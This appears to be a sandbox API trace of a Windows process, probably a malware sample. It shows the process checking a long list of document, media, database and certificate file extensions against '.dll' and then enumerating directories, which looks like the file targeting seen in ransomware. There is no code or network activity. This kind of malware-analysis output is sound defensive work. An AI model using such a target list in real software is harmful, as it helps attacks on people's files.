lstrcmpiW (lpString1=".dae", lpString2=".dll") returned -1 [0295.868] lstrlenW (lpString=".dat") returned 4 [0295.868] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0295.868] lstrlenW (lpString=".db") returned 3 [0295.868] lstrcmpiW (lpString1=".db", lpString2="dll") returned -1 [0295.868] lstrlenW (lpString=".dbf") returned 4 [0295.868] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0295.868] lstrlenW (lpString=".dbx") returned 4 [0295.868] lstrcmpiW (lpString1=".dbx", lpString2=".dll") returned -1 [0295.868] lstrlenW (lpString=".dc3") returned 4 [0295.868] lstrcmpiW (lpString1=".dc3", lpString2=".dll") returned -1 [0295.868] lstrlenW (lpString=".dcm") returned 4 [0295.868] lstrcmpiW (lpString1=".dcm", lpString2=".dll") returned -1 [0295.868] lstrlenW (lpString=".dcr") returned 4 [0295.868] lstrcmpiW (lpString1=".dcr", lpString2=".dll") returned -1 [0295.868] lstrlenW (lpString=".der") returned 4 [0295.869] lstrcmpiW (lpString1=".der", lpString2=".dll") returned -1 [0295.869] lstrlenW (lpString=".dib") returned 4 [0295.869] lstrcmpiW (lpString1=".dib", lpString2=".dll") returned -1 [0295.869] lstrlenW (lpString=".dic") returned 4 [0295.869] lstrcmpiW (lpString1=".dic", lpString2=".dll") returned -1 [0295.869] lstrlenW (lpString=".dif") returned 4 [0295.869] lstrcmpiW (lpString1=".dif", lpString2=".dll") returned -1 [0295.869] lstrlenW (lpString=".divx") returned 5 [0295.869] lstrcmpiW (lpString1=".divx", lpString2="t.dll") returned -1 [0295.869] lstrlenW (lpString=".djvu") returned 5 [0295.869] lstrcmpiW (lpString1=".djvu", lpString2="t.dll") returned -1 [0295.869] lstrlenW (lpString=".dng") returned 4 [0295.869] lstrcmpiW (lpString1=".dng", lpString2=".dll") returned 1 [0295.869] lstrlenW (lpString=".doc") returned 4 [0295.869] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0295.869] lstrlenW (lpString=".docm") returned 5 [0295.869] lstrcmpiW (lpString1=".docm", lpString2="t.dll") returned -1 [0295.869] lstrlenW (lpString=".docx") returned 5 [0295.869] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0295.869] lstrlenW (lpString=".dot") returned 4 [0295.869] lstrcmpiW (lpString1=".dot", lpString2=".dll") returned 1 [0295.869] lstrlenW (lpString=".dotm") returned 5 [0295.869] lstrcmpiW (lpString1=".dotm", lpString2="t.dll") returned -1 [0295.869] lstrlenW (lpString=".dotx") returned 5 [0295.869] lstrcmpiW (lpString1=".dotx", lpString2="t.dll") returned -1 [0295.870] lstrlenW (lpString=".dpx") returned 4 [0295.870] lstrcmpiW (lpString1=".dpx", lpString2=".dll") returned 1 [0295.870] lstrlenW (lpString=".dqy") returned 4 [0295.870] lstrcmpiW (lpString1=".dqy", lpString2=".dll") returned 1 [0295.870] lstrlenW (lpString=".dsn") returned 4 [0295.870] lstrcmpiW (lpString1=".dsn", lpString2=".dll") returned 1 [0295.870] lstrlenW (lpString=".dt") returned 3 [0295.870] lstrcmpiW (lpString1=".dt", lpString2="dll") returned -1 [0295.870] lstrlenW (lpString=".dtd") returned 4 [0295.870] lstrcmpiW (lpString1=".dtd", lpString2=".dll") returned 1 [0295.870] lstrlenW (lpString=".dwg") returned 4 [0295.870] lstrcmpiW (lpString1=".dwg", lpString2=".dll") returned 1 [0295.870] lstrlenW (lpString=".dwt") returned 4 [0295.870] lstrcmpiW (lpString1=".dwt", lpString2=".dll") returned 1 [0295.870] lstrlenW (lpString=".dx") returned 3 [0295.870] lstrcmpiW (lpString1=".dx", lpString2="dll") returned -1 [0295.870] lstrlenW (lpString=".dxf") returned 4 [0295.870] lstrcmpiW (lpString1=".dxf", lpString2=".dll") returned 1 [0295.870] lstrlenW (lpString=".edml") returned 5 [0295.870] lstrcmpiW (lpString1=".edml", lpString2="t.dll") returned -1 [0295.870] lstrlenW (lpString=".efd") returned 4 [0295.870] lstrcmpiW (lpString1=".efd", lpString2=".dll") returned 1 [0295.870] lstrlenW (lpString=".elf") returned 4 [0295.870] lstrcmpiW (lpString1=".elf", lpString2=".dll") returned 1 [0295.870] lstrlenW (lpString=".emf") returned 4 [0295.871] lstrcmpiW (lpString1=".emf", lpString2=".dll") returned 1 [0295.871] lstrlenW (lpString=".emz") returned 4 [0295.871] lstrcmpiW (lpString1=".emz", lpString2=".dll") returned 1 [0295.871] lstrlenW (lpString=".epf") returned 4 [0295.871] lstrcmpiW (lpString1=".epf", lpString2=".dll") returned 1 [0295.871] lstrlenW (lpString=".eps") returned 4 [0295.871] lstrcmpiW (lpString1=".eps", lpString2=".dll") returned 1 [0295.871] lstrlenW (lpString=".epsf") returned 5 [0295.871] lstrcmpiW (lpString1=".epsf", lpString2="t.dll") returned -1 [0295.871] lstrlenW (lpString=".epsp") returned 5 [0295.871] lstrcmpiW (lpString1=".epsp", lpString2="t.dll") returned -1 [0295.871] lstrlenW (lpString=".erf") returned 4 [0295.871] lstrcmpiW (lpString1=".erf", lpString2=".dll") returned 1 [0295.871] lstrlenW (lpString=".exr") returned 4 [0295.871] lstrcmpiW (lpString1=".exr", lpString2=".dll") returned 1 [0295.871] lstrlenW (lpString=".f4v") returned 4 [0295.871] lstrcmpiW (lpString1=".f4v", lpString2=".dll") returned 1 [0295.871] lstrlenW (lpString=".fido") returned 5 [0295.871] lstrcmpiW (lpString1=".fido", lpString2="t.dll") returned -1 [0295.871] lstrlenW (lpString=".flm") returned 4 [0295.871] lstrcmpiW (lpString1=".flm", lpString2=".dll") returned 1 [0295.871] lstrlenW (lpString=".flv") returned 4 [0295.871] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0295.871] lstrlenW (lpString=".frm") returned 4 [0295.871] lstrcmpiW (lpString1=".frm", lpString2=".dll") returned 1 [0295.872] lstrlenW (lpString=".fxg") returned 4 [0295.872] lstrcmpiW (lpString1=".fxg", lpString2=".dll") returned 1 [0295.872] lstrlenW (lpString=".geo") returned 4 [0295.872] lstrcmpiW (lpString1=".geo", lpString2=".dll") returned 1 [0295.872] lstrlenW (lpString=".gif") returned 4 [0295.872] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0295.872] lstrlenW (lpString=".grs") returned 4 [0295.872] lstrcmpiW (lpString1=".grs", lpString2=".dll") returned 1 [0295.872] lstrlenW (lpString=".gz") returned 3 [0295.872] lstrcmpiW (lpString1=".gz", lpString2="dll") returned -1 [0295.872] lstrlenW (lpString=".h") returned 2 [0295.872] lstrcmpiW (lpString1=".h", lpString2="ll") returned -1 [0295.872] lstrlenW (lpString=".hdr") returned 4 [0295.872] lstrcmpiW (lpString1=".hdr", lpString2=".dll") returned 1 [0295.872] lstrlenW (lpString=".hpp") returned 4 [0295.872] lstrcmpiW (lpString1=".hpp", lpString2=".dll") returned 1 [0295.872] lstrlenW (lpString=".hta") returned 4 [0295.872] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0295.872] lstrlenW (lpString=".htc") returned 4 [0295.872] lstrcmpiW (lpString1=".htc", lpString2=".dll") returned 1 [0295.872] lstrlenW (lpString=".htm") returned 4 [0295.872] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0295.872] lstrlenW (lpString=".html") returned 5 [0295.872] lstrcmpiW (lpString1=".html", lpString2="t.dll") returned -1 [0295.872] lstrlenW (lpString=".icb") returned 4 [0295.873] lstrcmpiW (lpString1=".icb", lpString2=".dll") returned 1 [0295.873] lstrlenW (lpString=".ics") returned 4 [0295.873] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0295.873] lstrlenW (lpString=".iff") returned 4 [0295.873] lstrcmpiW (lpString1=".iff", lpString2=".dll") returned 1 [0295.873] lstrlenW (lpString=".inc") returned 4 [0295.873] lstrcmpiW (lpString1=".inc", lpString2=".dll") returned 1 [0295.873] lstrlenW (lpString=".indd") returned 5 [0295.873] lstrcmpiW (lpString1=".indd", lpString2="t.dll") returned -1 [0295.873] lstrlenW (lpString=".ini") returned 4 [0295.873] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0295.873] lstrlenW (lpString=".iqy") returned 4 [0295.873] lstrcmpiW (lpString1=".iqy", lpString2=".dll") returned 1 [0295.873] lstrlenW (lpString=".j2c") returned 4 [0295.873] lstrcmpiW (lpString1=".j2c", lpString2=".dll") returned 1 [0295.873] lstrlenW (lpString=".j2k") returned 4 [0295.873] lstrcmpiW (lpString1=".j2k", lpString2=".dll") returned 1 [0295.873] lstrlenW (lpString=".java") returned 5 [0295.873] lstrcmpiW (lpString1=".java", lpString2="t.dll") returned -1 [0295.873] lstrlenW (lpString=".jp2") returned 4 [0295.873] lstrcmpiW (lpString1=".jp2", lpString2=".dll") returned 1 [0295.873] lstrlenW (lpString=".jpc") returned 4 [0295.873] lstrcmpiW (lpString1=".jpc", lpString2=".dll") returned 1 [0295.873] lstrlenW (lpString=".jpe") returned 4 [0295.873] lstrcmpiW (lpString1=".jpe", lpString2=".dll") returned 1 [0295.873] lstrlenW (lpString=".jpeg") returned 5 [0295.874] lstrcmpiW (lpString1=".jpeg", lpString2="t.dll") returned -1 [0295.874] lstrlenW (lpString=".jpf") returned 4 [0295.874] lstrcmpiW (lpString1=".jpf", lpString2=".dll") returned 1 [0295.874] lstrlenW (lpString=".jpg") returned 4 [0295.874] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0295.874] lstrlenW (lpString=".jpx") returned 4 [0295.874] lstrcmpiW (lpString1=".jpx", lpString2=".dll") returned 1 [0295.874] lstrlenW (lpString=".js") returned 3 [0295.874] lstrcmpiW (lpString1=".js", lpString2="dll") returned -1 [0295.874] lstrlenW (lpString=".jsf") returned 4 [0295.874] lstrcmpiW (lpString1=".jsf", lpString2=".dll") returned 1 [0295.874] lstrlenW (lpString=".json") returned 5 [0295.874] lstrcmpiW (lpString1=".json", lpString2="t.dll") returned -1 [0295.874] lstrlenW (lpString=".jsp") returned 4 [0295.874] lstrcmpiW (lpString1=".jsp", lpString2=".dll") returned 1 [0295.874] lstrlenW (lpString=".kdc") returned 4 [0295.874] lstrcmpiW (lpString1=".kdc", lpString2=".dll") returned 1 [0295.874] lstrlenW (lpString=".kmz") returned 4 [0295.874] lstrcmpiW (lpString1=".kmz", lpString2=".dll") returned 1 [0295.874] lstrlenW (lpString=".kwm") returned 4 [0295.874] lstrcmpiW (lpString1=".kwm", lpString2=".dll") returned 1 [0295.874] lstrlenW (lpString=".lasso") returned 6 [0295.874] lstrcmpiW (lpString1=".lasso", lpString2="nt.dll") returned -1 [0295.874] lstrlenW (lpString=".lbi") returned 4 [0295.875] lstrcmpiW (lpString1=".lbi", lpString2=".dll") returned 1 [0295.875] lstrlenW (lpString=".lgf") returned 4 [0295.875] lstrcmpiW (lpString1=".lgf", lpString2=".dll") returned 1 [0295.875] lstrlenW (lpString=".lgp") returned 4 [0295.875] lstrcmpiW (lpString1=".lgp", lpString2=".dll") returned 1 [0295.875] lstrlenW (lpString=".log") returned 4 [0295.875] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0295.875] lstrlenW (lpString=".m1v") returned 4 [0295.875] lstrcmpiW (lpString1=".m1v", lpString2=".dll") returned 1 [0295.875] lstrlenW (lpString=".m4a") returned 4 [0295.875] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0295.875] lstrlenW (lpString=".m4v") returned 4 [0295.875] lstrcmpiW (lpString1=".m4v", lpString2=".dll") returned 1 [0295.875] lstrlenW (lpString=".max") returned 4 [0295.875] lstrcmpiW (lpString1=".max", lpString2=".dll") returned 1 [0295.875] lstrlenW (lpString=".md") returned 3 [0295.875] lstrcmpiW (lpString1=".md", lpString2="dll") returned -1 [0295.875] lstrlenW (lpString=".mda") returned 4 [0295.875] lstrcmpiW (lpString1=".mda", lpString2=".dll") returned 1 [0295.875] lstrlenW (lpString=".mdb") returned 4 [0295.875] lstrcmpiW (lpString1=".mdb", lpString2=".dll") returned 1 [0295.875] lstrlenW (lpString=".mde") returned 4 [0295.875] lstrcmpiW (lpString1=".mde", lpString2=".dll") returned 1 [0295.875] lstrlenW (lpString=".mdf") returned 4 [0295.875] lstrcmpiW (lpString1=".mdf", lpString2=".dll") returned 1 [0295.875] lstrlenW (lpString=".mdw") returned 4 [0295.876] lstrcmpiW (lpString1=".mdw", lpString2=".dll") returned 1 [0295.876] lstrlenW (lpString=".mef") returned 4 [0295.876] lstrcmpiW (lpString1=".mef", lpString2=".dll") returned 1 [0295.876] lstrlenW (lpString=".mft") returned 4 [0295.876] lstrcmpiW (lpString1=".mft", lpString2=".dll") returned 1 [0295.876] lstrlenW (lpString=".mfw") returned 4 [0295.876] lstrcmpiW (lpString1=".mfw", lpString2=".dll") returned 1 [0295.876] lstrlenW (lpString=".mht") returned 4 [0295.876] lstrcmpiW (lpString1=".mht", lpString2=".dll") returned 1 [0295.876] lstrlenW (lpString=".mhtml") returned 6 [0295.876] lstrcmpiW (lpString1=".mhtml", lpString2="nt.dll") returned -1 [0295.876] lstrlenW (lpString=".mka") returned 4 [0295.876] lstrcmpiW (lpString1=".mka", lpString2=".dll") returned 1 [0295.876] lstrlenW (lpString=".mkidx") returned 6 [0295.876] lstrcmpiW (lpString1=".mkidx", lpString2="nt.dll") returned -1 [0295.876] lstrlenW (lpString=".mkv") returned 4 [0295.876] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0295.876] lstrlenW (lpString=".mos") returned 4 [0295.876] lstrcmpiW (lpString1=".mos", lpString2=".dll") returned 1 [0295.876] lstrlenW (lpString=".mov") returned 4 [0295.876] lstrcmpiW (lpString1=".mov", lpString2=".dll") returned 1 [0295.876] lstrlenW (lpString=".mp3") returned 4 [0295.876] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0295.876] lstrlenW (lpString=".mp4") returned 4 [0295.877] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0295.877] lstrlenW (lpString=".mpeg") returned 5 [0295.877] lstrcmpiW (lpString1=".mpeg", lpString2="t.dll") returned -1 [0295.877] lstrlenW (lpString=".mpg") returned 4 [0295.877] lstrcmpiW (lpString1=".mpg", lpString2=".dll") returned 1 [0295.877] lstrlenW (lpString=".mpv") returned 4 [0295.877] lstrcmpiW (lpString1=".mpv", lpString2=".dll") returned 1 [0295.877] lstrlenW (lpString=".mrw") returned 4 [0295.877] lstrcmpiW (lpString1=".mrw", lpString2=".dll") returned 1 [0295.877] lstrlenW (lpString=".msg") returned 4 [0295.877] lstrcmpiW (lpString1=".msg", lpString2=".dll") returned 1 [0295.877] lstrlenW (lpString=".mxl") returned 4 [0295.877] lstrcmpiW (lpString1=".mxl", lpString2=".dll") returned 1 [0295.877] lstrlenW (lpString=".myd") returned 4 [0295.877] lstrcmpiW (lpString1=".myd", lpString2=".dll") returned 1 [0295.877] lstrlenW (lpString=".myi") returned 4 [0295.877] lstrcmpiW (lpString1=".myi", lpString2=".dll") returned 1 [0295.877] lstrlenW (lpString=".nef") returned 4 [0295.877] lstrcmpiW (lpString1=".nef", lpString2=".dll") returned 1 [0295.877] lstrlenW (lpString=".nrw") returned 4 [0295.877] lstrcmpiW (lpString1=".nrw", lpString2=".dll") returned 1 [0295.877] lstrlenW (lpString=".obj") returned 4 [0295.877] lstrcmpiW (lpString1=".obj", lpString2=".dll") returned 1 [0295.877] lstrlenW (lpString=".odb") returned 4 [0295.878] lstrcmpiW (lpString1=".odb", lpString2=".dll") returned 1 [0295.878] lstrlenW (lpString=".odc") returned 4 [0295.878] lstrcmpiW (lpString1=".odc", lpString2=".dll") returned 1 [0295.878] lstrlenW (lpString=".odm") returned 4 [0295.878] lstrcmpiW (lpString1=".odm", lpString2=".dll") returned 1 [0295.878] lstrlenW (lpString=".odp") returned 4 [0295.878] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0295.878] lstrlenW (lpString=".ods") returned 4 [0295.878] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0295.878] lstrlenW (lpString=".oft") returned 4 [0295.878] lstrcmpiW (lpString1=".oft", lpString2=".dll") returned 1 [0295.878] lstrlenW (lpString=".one") returned 4 [0295.878] lstrcmpiW (lpString1=".one", lpString2=".dll") returned 1 [0295.878] lstrlenW (lpString=".onepkg") returned 7 [0295.878] lstrcmpiW (lpString1=".onepkg", lpString2="ent.dll") returned -1 [0295.878] lstrlenW (lpString=".onetoc2") returned 8 [0295.878] lstrcmpiW (lpString1=".onetoc2", lpString2="ient.dll") returned -1 [0295.878] lstrlenW (lpString=".opt") returned 4 [0295.878] lstrcmpiW (lpString1=".opt", lpString2=".dll") returned 1 [0295.878] lstrlenW (lpString=".oqy") returned 4 [0295.878] lstrcmpiW (lpString1=".oqy", lpString2=".dll") returned 1 [0295.878] lstrlenW (lpString=".orf") returned 4 [0295.878] lstrcmpiW (lpString1=".orf", lpString2=".dll") returned 1 [0295.878] lstrlenW (lpString=".p12") returned 4 [0295.878] lstrcmpiW (lpString1=".p12", lpString2=".dll") returned 1 [0295.878] lstrlenW (lpString=".p7b") returned 4 [0295.879] lstrcmpiW (lpString1=".p7b", lpString2=".dll") returned 1 [0295.879] lstrlenW (lpString=".p7c") returned 4 [0295.879] lstrcmpiW (lpString1=".p7c", lpString2=".dll") returned 1 [0295.879] lstrlenW (lpString=".pam") returned 4 [0295.879] lstrcmpiW (lpString1=".pam", lpString2=".dll") returned 1 [0295.879] lstrlenW (lpString=".pbm") returned 4 [0295.879] lstrcmpiW (lpString1=".pbm", lpString2=".dll") returned 1 [0295.879] lstrlenW (lpString=".pct") returned 4 [0295.879] lstrcmpiW (lpString1=".pct", lpString2=".dll") returned 1 [0295.879] lstrlenW (lpString=".pcx") returned 4 [0295.879] lstrcmpiW (lpString1=".pcx", lpString2=".dll") returned 1 [0295.879] lstrlenW (lpString=".pdd") returned 4 [0295.879] lstrcmpiW (lpString1=".pdd", lpString2=".dll") returned 1 [0295.879] lstrlenW (lpString=".pdf") returned 4 [0295.879] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0295.879] lstrlenW (lpString=".pdp") returned 4 [0295.879] lstrcmpiW (lpString1=".pdp", lpString2=".dll") returned 1 [0295.879] lstrlenW (lpString=".pef") returned 4 [0295.879] lstrcmpiW (lpString1=".pef", lpString2=".dll") returned 1 [0295.879] lstrlenW (lpString=".pem") returned 4 [0295.879] lstrcmpiW (lpString1=".pem", lpString2=".dll") returned 1 [0295.879] lstrlenW (lpString=".pff") returned 4 [0295.879] lstrcmpiW (lpString1=".pff", lpString2=".dll") returned 1 [0295.879] lstrlenW (lpString=".pfm") returned 4 [0295.879] lstrcmpiW (lpString1=".pfm", lpString2=".dll") returned 1 [0295.880] lstrlenW (lpString=".pfx") returned 4 [0295.880] lstrcmpiW (lpString1=".pfx", lpString2=".dll") returned 1 [0295.880] lstrlenW (lpString=".pgm") returned 4 [0295.880] lstrcmpiW (lpString1=".pgm", lpString2=".dll") returned 1 [0295.880] lstrlenW (lpString=".php") returned 4 [0295.880] lstrcmpiW (lpString1=".php", lpString2=".dll") returned 1 [0295.880] lstrlenW (lpString=".php3") returned 5 [0295.880] lstrcmpiW (lpString1=".php3", lpString2="t.dll") returned -1 [0295.880] lstrlenW (lpString=".php4") returned 5 [0295.880] lstrcmpiW (lpString1=".php4", lpString2="t.dll") returned -1 [0295.880] lstrlenW (lpString=".php5") returned 5 [0295.880] lstrcmpiW (lpString1=".php5", lpString2="t.dll") returned -1 [0295.880] lstrlenW (lpString=".phtml") returned 6 [0295.880] lstrcmpiW (lpString1=".phtml", lpString2="nt.dll") returned -1 [0295.880] lstrlenW (lpString=".pict") returned 5 [0295.880] lstrcmpiW (lpString1=".pict", lpString2="t.dll") returned -1 [0295.880] lstrlenW (lpString=".pl") returned 3 [0295.880] lstrcmpiW (lpString1=".pl", lpString2="dll") returned -1 [0295.880] lstrlenW (lpString=".pls") returned 4 [0295.880] lstrcmpiW (lpString1=".pls", lpString2=".dll") returned 1 [0295.880] lstrlenW (lpString=".pm") returned 3 [0295.880] lstrcmpiW (lpString1=".pm", lpString2="dll") returned -1 [0295.880] lstrlenW (lpString=".png") returned 4 [0295.880] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0295.880] lstrlenW (lpString=".pnm") returned 4 [0295.880] lstrcmpiW (lpString1=".pnm", lpString2=".dll") returned 1 [0295.881] lstrlenW (lpString=".pot") returned 4 [0295.881] lstrcmpiW (lpString1=".pot", lpString2=".dll") returned 1 [0295.881] lstrlenW (lpString=".potm") returned 5 [0295.881] lstrcmpiW (lpString1=".potm", lpString2="t.dll") returned -1 [0295.881] lstrlenW (lpString=".potx") returned 5 [0295.881] lstrcmpiW (lpString1=".potx", lpString2="t.dll") returned -1 [0295.881] lstrlenW (lpString=".ppa") returned 4 [0295.881] lstrcmpiW (lpString1=".ppa", lpString2=".dll") returned 1 [0295.881] lstrlenW (lpString=".ppam") returned 5 [0295.881] lstrcmpiW (lpString1=".ppam", lpString2="t.dll") returned -1 [0295.881] lstrlenW (lpString=".ppm") returned 4 [0295.881] lstrcmpiW (lpString1=".ppm", lpString2=".dll") returned 1 [0295.881] lstrlenW (lpString=".pps") returned 4 [0295.881] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0295.881] lstrlenW (lpString=".ppsm") returned 5 [0295.881] lstrcmpiW (lpString1=".ppsm", lpString2="t.dll") returned -1 [0295.881] lstrlenW (lpString=".ppt") returned 4 [0295.881] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0295.881] lstrlenW (lpString=".pptm") returned 5 [0295.881] lstrcmpiW (lpString1=".pptm", lpString2="t.dll") returned -1 [0295.881] lstrlenW (lpString=".pptx") returned 5 [0295.881] lstrcmpiW (lpString1=".pptx", lpString2="t.dll") returned -1 [0295.881] lstrlenW (lpString=".prn") returned 4 [0295.881] lstrcmpiW (lpString1=".prn", lpString2=".dll") returned 1 [0295.882] lstrlenW (lpString=".ps") returned 3 [0295.882] lstrcmpiW (lpString1=".ps", lpString2="dll") returned -1 [0295.882] lstrlenW (lpString=".psb") returned 4 [0295.882] lstrcmpiW (lpString1=".psb", lpString2=".dll") returned 1 [0295.882] lstrlenW (lpString=".psd") returned 4 [0295.882] lstrcmpiW (lpString1=".psd", lpString2=".dll") returned 1 [0295.882] lstrlenW (lpString=".pst") returned 4 [0295.882] lstrcmpiW (lpString1=".pst", lpString2=".dll") returned 1 [0295.882] lstrlenW (lpString=".ptx") returned 4 [0295.882] lstrcmpiW (lpString1=".ptx", lpString2=".dll") returned 1 [0295.882] lstrlenW (lpString=".pub") returned 4 [0295.882] lstrcmpiW (lpString1=".pub", lpString2=".dll") returned 1 [0295.882] lstrlenW (lpString=".pwm") returned 4 [0295.882] lstrcmpiW (lpString1=".pwm", lpString2=".dll") returned 1 [0295.882] lstrlenW (lpString=".pxr") returned 4 [0295.882] lstrcmpiW (lpString1=".pxr", lpString2=".dll") returned 1 [0295.882] lstrlenW (lpString=".py") returned 3 [0295.882] lstrcmpiW (lpString1=".py", lpString2="dll") returned -1 [0295.882] lstrlenW (lpString=".qt") returned 3 [0295.882] lstrcmpiW (lpString1=".qt", lpString2="dll") returned -1 [0295.882] lstrlenW (lpString=".r3d") returned 4 [0295.882] lstrcmpiW (lpString1=".r3d", lpString2=".dll") returned 1 [0295.884] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0295.884] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x138defa8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x138defa8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi", cAlternateFileName="")) returned 1 [0295.887] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0295.887] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13440553, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13440553, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr", cAlternateFileName="")) returned 1 [0295.889] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0295.889] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ac3a61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13aced2b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13aced2b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gl", cAlternateFileName="")) returned 1 [0295.891] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0295.891] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4a98712, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13a8299e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13a8299e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he", cAlternateFileName="")) returned 1 [0295.894] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0295.894] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa806c3d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1428e945, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1428e945, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hi", cAlternateFileName="")) returned 1 [0295.897] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0295.897] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7beb2bc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13b67741, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13b67741, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr", cAlternateFileName="")) returned 1 [0296.208] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.208] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6164f96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14648313, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14648313, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu", cAlternateFileName="")) returned 1 [0296.211] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.212] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1434d390, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1434d390, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="id", cAlternateFileName="")) returned 1 [0296.214] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0296.214] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf964b3dd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14969496, 